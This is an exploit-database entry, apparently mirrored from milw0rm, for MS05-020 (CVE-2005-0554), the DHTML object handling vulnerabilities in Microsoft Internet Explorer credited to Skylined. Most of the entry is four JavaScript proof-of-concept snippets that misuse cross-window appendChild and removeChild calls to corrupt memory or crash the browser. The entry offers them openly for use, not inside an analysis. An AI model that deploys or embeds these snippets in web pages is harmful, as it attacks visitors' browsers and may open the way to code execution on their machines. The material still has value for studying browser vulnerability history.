Microsoft Internet Explorer - DHTML Object Handling (MS05-020)



EKU-ID: 9061 CVE: CVE-2005-0554;MS05-020 OSVDB-ID:
Author: Skylined Published: 2005-04-12 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


<!-- Here are multiple Microsoft Internet Explorer DHTML Object Handling Vulnerabilities by Skylined /str0ke -->

<SCRIPT language="javascript">
    a=document.createTextNode();try{window.open().document.appendChild(a);}catch(e){}document.removeChild(a);
</SCRIPT>

<SCRIPT language="javascript">
  p=document.createElement();c=window.open().document.createElement();try{c.appendChild(p);}catch(e){p.removeChild(c);};
</SCRIPT>

<SCRIPT language="javascript">
    try{window.open().document.appendChild(document);}catch(e){}
</SCRIPT>

<SCRIPT>
    try{window.open().document.appendChild(document.all[0]);}catch(e){}
</SCRIPT>

# milw0rm.com [2005-04-12]